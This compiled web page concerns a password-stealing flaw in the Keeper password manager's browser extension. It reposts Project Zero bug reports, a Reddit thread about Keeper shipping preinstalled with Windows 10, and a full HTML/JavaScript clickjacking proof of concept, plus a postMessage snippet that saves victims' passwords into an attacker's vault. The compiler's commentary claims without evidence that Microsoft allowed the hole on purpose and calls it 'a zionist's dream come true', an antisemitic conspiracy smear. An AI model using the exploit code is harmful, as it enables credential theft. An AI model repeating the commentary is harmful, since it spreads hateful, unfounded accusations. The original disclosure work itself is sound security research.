'Keeper' Password Manager Password Thief

1. 'Keeper' Password Manager pre-packaged with Windows 10 allows complete and easy password theft
2.  
3. Crapware pre-packaged with Windows 10 allows complete and easy password theft
4. A password manager called "keeper" is installed in Windows 10 by default. It allows easy password theft. Microsoft knew this months ago, and kept this vulnerability wide open in the latest update.
5. The following was posted to bugs.chromium.org
6. keeper: privileged ui injected into pages (again)
7. I recently created a fresh Windows 10 VM with a pristine image from MSDN, and found that a password manager called "Keeper" is now installed by default. I'm not the only person who has noticed this:
8. https://www.reddit.com/r/Windows10/comments/6dpj78/keeper_password_manager_comes_preinstalled_now/
9. I assume this is some bundling deal with Microsoft. I've heard of Keeper, I remember filing a bug a while ago about how they were injecting privileged UI into pages ( issue 917 ). Amazingly, they're doing the exact same thing again with this version. I think I'm being generous considering this a new issue that qualifies for a ninety day disclosure, as I literally just changed the selectors and the same attack works.
10. Nevertheless, this is (again) a complete compromise of Keeper security, allowing any website to steal any password. Here is a working demo that steals your twitter password:
11. https://lock.cmpxchg8b.com/keepertest.html
12. Please consider adding regression tests before releasing an update for this issue, as I do not plan on creating new issues for every piece of UI I can dispatch events to, and attackers will certainly check them all.
13. This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available, the bug report will become visible to the public.
14. My comment: It could not be any more obvious that Microsoft allowed this intentionally in a way they could push the blame off on someone else. This will allow subversive political groups a way to:
15. 1. Get countless false posts in the names of many people in whatever locations they feel are highly strategic politically.
16. 2. Give them a doorway into every opponent's life, so they can destroy that opponent and the opponent will never knew what hit them. That opponent could be as benign as your grandma when it is made this easy for an attacker.
17. 3. Steal whatever they want.
18. This kind of security hole is a zionist's dream come true. They can destroy absolutely anyone with it. Not at all surprising it is Microsoft allowing it.
19. http://82.221.129.208/.zo4.html
20.  
21. This is an archived post. You won't be able to vote or comment.
22. 10
23.  
24. NewsKeeper Password Manager comes preinstalled now i.redd.it
25. submitted 6 months ago by ToppestOfDogs
26. • 20 comments
27. • share
28. • save
29. •
30. hide
31. • report
32.  
33. all 20 comments
34. sorted by:
35. best
36.  
37. Want to add to the discussion?
38. Post a comment!
39. CREATE AN ACCOUNT
40.  
41. [–]ToppestOfDogs[S] 7 points 6 months ago
42. I just reinstalled Windows 10 today, and I was uninstalling all the bundled apps like usual, and I noticed that Keeper Password Manager is preinstalled now. I've never seen this come installed with Windows before.
43. And this isn't a link to install it like some of the other apps, it's actually installed and opens.
44. • permalink
45. • embed
46. • save
47. [–]aaronfranke 2 points 6 months ago
48. Which edition?
49. • permalink
50. • embed
51. • save
52. • parent
53. [–]ToppestOfDogs[S] 5 points 6 months ago
54. Pro
55. • permalink
56. • embed
57. • save
58. • parent
59. [–]maspiers 2 points 6 months ago
60. Had it happen on home too, reimaging a PC last week
61. • permalink
62. • embed
63. • save
64. • parent
65. [–]4690 2 points 6 months ago
66. Not OP, but I've had it happen in a VM when I installed 10 Pro on it.
67. • permalink
68. • embed
69. • save
70. • parent
71. [–]vitorgrs 4 points 6 months ago
72. CDM (Content Delivery Manager) does it. It will pre-install some apps based on "your taste".
73. • permalink
74. • embed
75. • save
76. • parent
77. [–]MorallyDeplorable 23 points 6 months ago
78. That's unsettling.
79. • permalink
80. • embed
81. • save
82. • parent
83. [–]ToppestOfDogs[S] 7 points 6 months ago
84. Weird. I've never installed any password stuff from the windows store
85. • permalink
86. • embed
87. • save
88. • parent
89. [–]luxtabula 3 points 6 months ago
90. I've been having computer problems recently and had to reset it. Keeper came preinstalled on the refresh. I highly doubt it was based on my tastes.
91. • permalink
92. • embed
93. • save
94. • parent
95. [–]iSn0wElite 3 points 6 months ago
96. I think this is true, because I reinstalled windows 10 pro today too and it didn't preinstall any password menager, I had some cooking apps instead 😂
97. • permalink
98. • embed
99. • save
100. • parent
101. [–]vitorgrs 5 points 6 months ago
102. Here it installs PowerBi and some "Enterprise" stuff lol
103. • permalink
104. • embed
105. • save
106. • parent
107. [–]jantari 2 points 6 months ago
108. Doubt it, it installed on a brand new laptop that never saw a Microsoft Account only one local admin
109. • permalink
110. • embed
111. • save
112. • parent
113. [–]kylegordon 1 point 4 months ago
114. A fresh laptop out the box here, wiped and 'reset with no data kept' or whatever it's called, and it the app was installed.
115. I hadn't put in any email addresses, logged in to any websites, or anything. Only my name for the mandatory user account.
116. It's not based on 'taste'
117. • permalink
118. • embed
119. • save
120. • parent
121. [–]jbobisaboss 6 points 5 months ago
122. Cntent Delivery Manager. It silently installs apps. You can disable this "feature" with a little registry editing:https://insidewindows.net/2016/08/24/how-to-stop-windows-10-1607-from-installing-unwanted-apps/
123. • permalink
124. • embed
125. • save
126. [–]PM_ME_LUCID_DREAMS 3 points 4 months ago
127. A bit late, but having reinstalled a "clean" Windows 10 from scratch, this registry edit (SilentInstalledAppsEnabled) was one of the first things I did.
128. After an "update", Keeper still appeared, alongside CandyCrush and other shit.
129. The registry key itself was not changed by the "update", and I removed the crapware again and doesn't come back seemingly until the next "update".
130. • permalink
131. • embed
132. • save
133. • parent
134. [–]rfarrell1978 1 point 4 months ago
135. Thanks for this. Regedit is a part of computers that I was totally ignorant to.
136. • permalink
137. • embed
138. • save
139. • parent
140. [–]Jordedude1234 1 point 1 month ago
141. Thank you. You have helped a person who google searched it.
142. • permalink
143. • embed
144. • save
145. • parent
146. [–]ACM1911 2 points 6 months ago
147. I've uninstalled this thing 3 times now. Please go the fuck away Keeper.
148. • permalink
149. • embed
150. • save
151. [–]exxxidor 2 points 5 months ago
152. Just got this installed today via the WindowsUpdateClient. Ugh.
153. Not sure if this is controlled by the Content Delivery System or not. Hope so, as I'm turning that off.
154. • permalink
155. • embed
156. • save
157. [–]JamesWildDev 1 point 6 months ago
158. I had this too! So weird.
159. • permalink
160. • embed
161. • save
162. https://www.reddit.com/r/Windows10/comments/6dpj78/keeper_password_manager_comes_preinstalled_now/?st=jbdxsf69&sh=9606f3e9
163.  
164.  
165. Keeper: Trusted UI is injected into untrusted webpage
166. Project Member Reported by taviso@google.com, Aug 26 2016
167. Back to list
168.  
169. I took a quick look at Keeper, a password manager for Windows, Mac, Linux. The extension injects it's trusted UI into untrusted webpages with a content script. I don't think that's safe to do.
170.  
171. I'm not a web developer, but you can see what I mean in the attached example. I only tested it in Chrome.
172.  
173. A more polished example is obviously possible.
174.  
175. The example does this:
176.  
177. 1. Click the little keeper icon you add to input boxes, that's just: document.getElementById('keeper-icon-2').click();
178. 2. Click the search button in the popup that appears.
179. 3. Search for "Google", e.g. document.getElementById('keeper-search-box-input').value="Google"
180. 4. wait for the search results to appear, then hide the iframe.
181. 5. When the user is about to click, display it and then wait for the password to be inserted.
182. 6. Now the page can read the password.
183.  
184. This bug is subject to a 90 day disclosure deadline. If 90 days elapse
185. without a broadly available patch, then the bug report will automatically
186. become visible to the public.
187.  
188.  
189. Comment 1 Deleted
190. Project Member Comment 2 by taviso@google.com, Aug 26 2016
191. I tried to make the example more reliable.
192.  
193. keeper.html
194. 5.0 KB View Download
195.  
196. Comment 3 Deleted
197. Project Member Comment 4 by taviso@google.com, Aug 26 2016
198. Keeper sent me an updated build that removes the search feature I was using. I suppose that solves the immediate problem. I noticed that the way messages were passed didn't seem safe though.
199.  
200. For example, it's possible to log someone into your account and then when they save their passwords, they're effectively giving them to you.
201.  
202. For example a website can do this:
203.  
204. x = window.open("https://keepersecurity.com/vault/");
205. x.postMessage({client: "ext", cmd: "logout"},"*")
206. x.postMessage({client: "ext", cmd: "login", login: "attacker@account.com", password: "attackerspassword"}, "*")
207.  
208. And now whenever you save a password, you're unknowingly saving it to the attackers. I asked why there isn't a check for message.origin == "chrome-extension://...", etc.
209.  
210. Project Member Comment 5 by taviso@google.com, Aug 27 2016
211. I uploaded the example here for testing.
212.  
213. https://lock.cmpxchg8b.com/keeper.html
214. Project Member Comment 6 by taviso@google.com, Aug 27 2016
215. Labels: -Restrict-View-Commit
216. Summary: Keeper: Trusted UI is injected into untrusted webpage (was: Keeper: trusted UI is injected into untrusted webpage)
217. It looks like the 10.1.3 update is live on the chrome web store, removing view restriction.
218. Comment 7 by cr...@keepersecurity.com, Aug 28 2016
219. This issue has been fixed with Keeper Browser Extension v10.1.3 which is live on Chrome web store. Below is the blog post related to the issue:
220.  
221. https://blog.keepersecurity.com/2016/08/28/security-update-for-keeper-browser-extension/
222.  
223. Project Member Comment 8 by taviso@google.com, Nov 1 2016
224. Status: Fixed
225.  
226. https://bugs.chromium.org/p/project-zero/issues/detail?id=917
227.  
228. keeper: privileged ui injected into pages (again)
229. Project Member Reported by taviso@google.com, Dec 14 (5 days ago)
230. Back to list
231.  
232.  
233. I recently created a fresh Windows 10 VM with a pristine image from MSDN, and found that a password manager called "Keeper" is now installed by default. I'm not the only person who has noticed this:
234.  
235. https://www.reddit.com/r/Windows10/comments/6dpj78/keeper_password_manager_comes_preinstalled_now/
236.  
237. I assume this is some bundling deal with Microsoft. I've heard of Keeper, I remember filing a bug a while ago about how they were injecting privileged UI into pages ( issue 917 ). I checked and, they're doing the same thing again with this version. I think I'm being generous considering this a new issue that qualifies for a ninety day disclosure, as I literally just changed the selectors and the same attack works.
238.  
239. Nevertheless, this is a complete compromise of Keeper security, allowing any website to steal any password. Here is a working demo that steals your twitter password:
240.  
241. https://lock.cmpxchg8b.com/keepertest.html
242.  
243. Please consider adding regression tests before releasing an update for this issue.
244.  
245.  
246. This bug is subject to a 90 day disclosure deadline. After 90 days elapse
247. or a patch has been made broadly available, the bug report will become
248. visible to the public.
249.  
250.  
251. Windows 7-2017-12-13-16-33-37.png
252. 43.2 KB View Download
253.  
254.  
255. Project Member Comment 1 by taviso@google.com, Dec 14 (5 days ago)
256. Description: Show this description
257.  
258. Project Member Comment 2 by taviso@google.com, Dec 14 (4 days ago)
259. Description: Show this description
260.  
261. Project Member Comment 3 by taviso@google.com, Dec 14 (4 days ago)
262. Keeper replied "we should have a fix built tomorrow and I will let you know when it has been published".
263.  
264. We discussed possible fixes, it sounds like they're just going to disable the feature for now.
265.  
266. Project Member Comment 4 by taviso@google.com, Dec 15 (4 days ago)
267. Status: Fixed
268. Keeper have told me they've released a fixed version.
269. Project Member Comment 5 by taviso@google.com, Dec 15 (4 days ago)
270. Labels: -Restrict-View-Commit
271. Comment 6 by cr...@keepersecurity.com, Dec 15 (3 days ago)
272. Version 11.4.4 was released 24 hours after the report. Here's our blog post:
273. https://blog.keepersecurity.com/2017/12/15/update-for-keeper-browser-extension-v11-4/
274.  
275.  
276. Project Member Comment 7 by taviso@google.com, Yesterday (43 hours ago)
277. Keeper sent me a mail requesting multiple changes to this report, the crux of their concern is that they believe the Keeper browser extension is a separate product to their Keeper desktop application, and believe this report conflates the two products.
278.  
279. The keeper browser extension is installed as part of the default setup flow for the Keeper application, the relevant prompt can be seen in the attached screenshot. Unless a user clicks "Skip" in this dialog, they would be affected by this vulnerability. I stand by my original assessment of this issue, and consider clicking "Skip" here a non-default configuration.
280.  
281. A user must have completed the setup flow to be vulnerable - the existence of the keeper icon in the start menu alone is not sufficient. If a user has clicked the icon and started using Keeper in the default configuration, they would be vulnerable.
282.  
283.  
284. keeper.jpg
285. 17.5 KB View Download
286.  
287.  
288.  
289. https://bugs.chromium.org/p/project-zero/issues/detail?id=1481&desc=3
290.  
291.  
292. This is the *second* time keeper have been injecting privileged search elements into pages. So yet again, here is how to steal the password for any website from a Keeper user.
293. This page just clicks the search button, types in "Twitter" and then adds this page to the list of logon URLs.
294. The content below could be invisible, it's low opacity just to demonstrate the attack.
295.  
296. https://lock.cmpxchg8b.com/keepertest.html
297.  
298.  
299.  
300. Issue 917 attachment: keeper.html (5.0 KB)
301.  
302.  
303. <html>
304. <head>
305. <script>
306.  
307. const kSearchTerm = "Twitter"; // What password to try to steal.
308. const kPollTime = 1000; // How often to check if the Keeper UI is ready.
309.  
310. var timer;
311. var frame;
312.  
313. // Interact with the UI elements Keeper adds to the page to bring up the search
314. // dialog.
315. function interact()
316. {
317. var icon = document.getElementById('keeper-icon-2');
318. var search = document.getElementsByClassName("ksec-icon-search")[0];
319. var input = document.getElementById('keeper-search-box-input');
320. var w = document.getElementById('keeper-injectWindow');
321. var create = document.getElementById('keeper-submitYesBtn');
322. var log = document.getElementsByClassName('keepersecurity_loginField')[0];
323. var pw = document.getElementsByClassName('keepersecurity_tx')[0];
324. var save = document.getElementById('save-and-fill-btn');
325.  
326. // Click the little key icon added to input boxes.
327. if (icon)
328. icon.click();
329.  
330. // Sometimes a dialog prompts before the popup is shown, dismiss it.
331. if (create && create.offsetParent) {
332. create.click();
333. return;
334. }
335.  
336. // If it's prompting for a password, fill it in and then reload.
337. if (pw && save && pw.offsetParent) {
338. pw.value = "__ignore";
339. save.click();
340. setTimeout("document.location.reload()", kPollTime);
341. return;
342. }
343.  
344. // Click the search icon on the top of the popup.
345. if (search)
346. search.click();
347.  
348. // Hide the elements created by Keeper.
349. if (w)
350. w.style.display = "none";
351.  
352. // Enter the search term "Google", which should add an iframe with results.
353. if (input) {
354. clearInterval(timer);
355. input.value = kSearchTerm;
356. input.dispatchEvent(new CustomEvent("keyup", {}))
357. timer = setInterval(stealframe, kPollTime);
358. }
359. }
360.  
361. function stealframe()
362. {
363. frame = document.getElementById('keeper-search-result-frame-results');
364. target = document.getElementById('target');
365.  
366. if (frame) {
367. clearInterval(timer);
368.  
369. // We can't access the results, but we can move the iframe around, as
370. // soon as it appears, remove it.
371. frame.parentElement.removeChild(frame);
372. target.style.display = "block";
373. // Move the iframe somewhere predictable, but make it transparent so
374. // the user doesn't know they're clicking it.
375. frame.style.position = "absolute";
376. frame.style.width = "256px";
377. frame.style.height = "64px";
378. frame.style.overflowX = "hidden";
379. frame.style.overflowY = "hidden";
380. frame.style.overflow = "hidden";
381. frame.style.opacity = "0.01";
382. //frame.style.top = "-30px"; // First button
383. frame.style.top = "-82px"; // Second button
384. frame.style.left = "0px";
385. target.appendChild(frame);
386. }
387. }
388.  
389. </script>
390. <style>
391. body {
392. font-family: Arial, Helvetica, sans-serif;
393. font-size: 16px;
394. }
395.  
396. /* Hide all Keeper UI */
397. kwdiv {
398. opacity: 0.01;
399. }
400.  
401. #target {
402. display: none;
403. }
404.  
405. #test {
406. opacity: 0.01;
407. }
408.  
409. #target {
410. position: relative;
411. font-weight: bold;
412. }
413.  
414. #filltitle {
415. font-size: 14px;
416. padding: 6px 0px;
417. position: absolute;
418. top: 7px;
419. left: 7px;
420. }
421.  
422. /* This is the cssText from the real button */
423. #fillbutton {
424. font-family: Arial, Helvetica, sans-serif;
425. font-size: 14px;
426. line-height: 20px;
427. color: rgb(0, 0, 238);
428. width: 44px;
429. padding: 6px 0px;
430. height: 20px;
431. text-align: center;
432. font-weight: bold;
433. border: 1px hidden;
434. border-radius: 3px;
435. cursor: pointer;
436. float: right;
437. margin-right: 16px;
438. position: absolute;
439. top: 7px;
440. left: 185px;
441. text-decoration: underline;
442. }
443. </style>
444. </head>
445.  
446. <body onload="timer = setInterval(interact, kPollTime)">
447.  
448. <p>
449. This demonstration attempts to automate interacting with the Keeper Chrome
450. extension so that the page can steal passwords.
451. </p>
452. <p>
453. This is done by:
454. <ul>
455. <li>Creating a hidden form that keeper adds a button (<img src="chrome-extension://bfogiafebfohielmmehodmfbbebbbpei/images/16x16gold.png">) to.</li>
456. <li>Finding that button, then clicking it with JavaScript.</li>
457. <li>Keeper injects a search dialog into the page, which I enter "Twitter" into.</li>
458. <li>Waiting for Keeper to draw an iframe with the search results.</li>
459. <li>Moving the frame around so you don't know what you're clicking on.</li>
460. <li>If you do click it, the password is sent to the untrusted page.</li>
461. </ul>
462. </p>
463. <p>
464. The result is that if you click anywhere on a page, you could be sending a
465. password for another site.
466. </p>
467. <div id=target>
468. <div id=filltitle>Try clicking this link:</div>
469. <div id=fillbutton>Here</div>
470. </div>
471.  
472. <form id=test>
473. <input type=text name=username>
474. <input type=password name=password onchange="(value != '__ignore') && alert(value)">
475. </form>
476. </body>
477. </html>
478.  
479. https://bugs.chromium.org/p/project-zero/issues/attachmentText?aid=248504